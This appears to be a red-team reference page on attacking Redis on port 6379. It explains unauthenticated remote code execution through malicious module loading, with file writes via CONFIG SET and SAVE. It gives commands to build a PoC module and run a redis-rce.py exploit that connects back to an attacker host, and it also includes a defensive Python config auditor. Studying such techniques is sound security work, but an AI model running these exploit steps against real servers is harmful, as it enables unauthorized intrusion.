6379 - Redis

Redis is an open-source, in-memory key-value data store used for high-performance caching, message brokering, and real-time analytics. It supports a variety of data structures like strings, hashes, lists, sets, and sorted sets, and operates entirely in memory for speed, with optional persistence to disk. By default, Redis listens on TCP port 6379 and has no authentication or encryption unless explicitly configured, which often makes it a target during red team operations.

Unauthenticated Root RCE

Vulnerability Overview

In Redis 4.x and 5.x instances, the ability to load shared object (.so) modules at runtime can be leveraged to gain RCE. Exploitation requires two conditions to be met:

  1. Privileged Access to Redis → The attacker must be able to issue privileged Redis commands such as MODULE LOAD. This is possible if the Redis instance is exposed to the internet without authentication or the attacker has acquired valid credentials to an authenticated instance. In addition, Redis must not restrict module loading; unless explicitly disabled, this capability is broadly accessible in insecure deployments.

  2. Writable Location on Target Filesystem → The attacker must be able to place a malicious .so file on the target machine. Two main techniques can be used:

    1. Abuse Redis’s persistence settings: using CONFIG SET dir and CONFIG SET dbfilename, combined with SAVE, an attacker can write arbitrary files to locations such as /tmp/.

    2. Upload externally: if another service (e.g., FTP) exposes a writable path, the attacker can upload the .so file and instruct Redis to load it by its absolute path.

Once the malicious module is in place, Redis will load it and execute the attacker's code within the server's process space, effectively achieving RCE.
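From the defensive side, both conditions can be checked in a redis.conf before deployment. The following auditor is an added example, not part of the original page or the PoC; the finding codes, function names and sample configurations are constructed for illustration, and protected mode is modelled as in the 4.x/5.x releases discussed here.

```python
import shlex

LOOPBACK = {"127.0.0.1", "::1"}
# Commands the two preconditions above rely on (MODULE LOAD, CONFIG SET, SAVE).
RISKY_COMMANDS = ("MODULE", "CONFIG", "SAVE")

def parse_conf(text):
    """Yield (directive, args) from redis.conf text, skipping comments and blank lines."""
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            parts = shlex.split(line)  # handles quoted values such as ""
            yield parts[0].lower(), parts[1:]

def audit(text):
    """Return finding codes for the exposure conditions described above."""
    last, renamed = {}, {}
    for name, args in parse_conf(text):
        if name == "rename-command" and len(args) == 2:
            renamed[args[0].upper()] = args[1]  # "" disables the command
        else:
            last[name] = args  # last occurrence wins
    has_auth = bool((last.get("requirepass") or [""])[0])
    protected = (last.get("protected-mode") or ["yes"])[0].lower() != "no"
    binds = last.get("bind") or []
    if binds:
        remote = any(addr not in LOOPBACK for addr in binds)
    else:
        # Assumption (4.x/5.x behaviour): with no bind directive Redis listens on
        # all interfaces, and protected mode limits clients to loopback only
        # when no password is set either.
        remote = not (protected and not has_auth)
    findings = []
    if not has_auth:
        findings.append("no-requirepass")
    if remote:
        findings.append("remote-reachable")
    findings += [f"default-name:{c}" for c in RISKY_COMMANDS if c not in renamed]
    return findings

# Constructed sample configurations, not taken from any real host.
WEAK_CONF = 'bind 0.0.0.0\nprotected-mode no\nport 6379\n'
HARDENED_CONF = '''
bind 127.0.0.1
protected-mode yes
requirepass "constructed-placeholder-secret"
rename-command MODULE ""
rename-command CONFIG ""
rename-command SAVE ""
'''

if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(label, audit(conf))
```

An empty findings list means the instance requires a password, is bound to loopback only, and no longer exposes MODULE, CONFIG or SAVE under their default names.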

Exploitation

In either case, a .so file must be created. This can be done with the original PoC or its modified, more modern version:

~$ git clone https://github.com/CSpanias/redis-module-rce && cd redis-module-rce && make
<SNIP>
gcc -Wall -fPIC -O2 -std=gnu99 -Imodule -shared -o module.so module/module.c

~/redis-module-rce$ ls -l module.so
-rwxr-xr-x 1 x7331 x7331 38704 Aug  1 14:29 module.so

~/redis-module-rce$ file module.so
module.so: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=c35119dc82e22bb135fb85215b9c0f40c98edde4, not stripped

This PoC can be used to leverage the Redis settings:

./redis-rce.py --rhost redis-instance --lhost 192.168.45.170
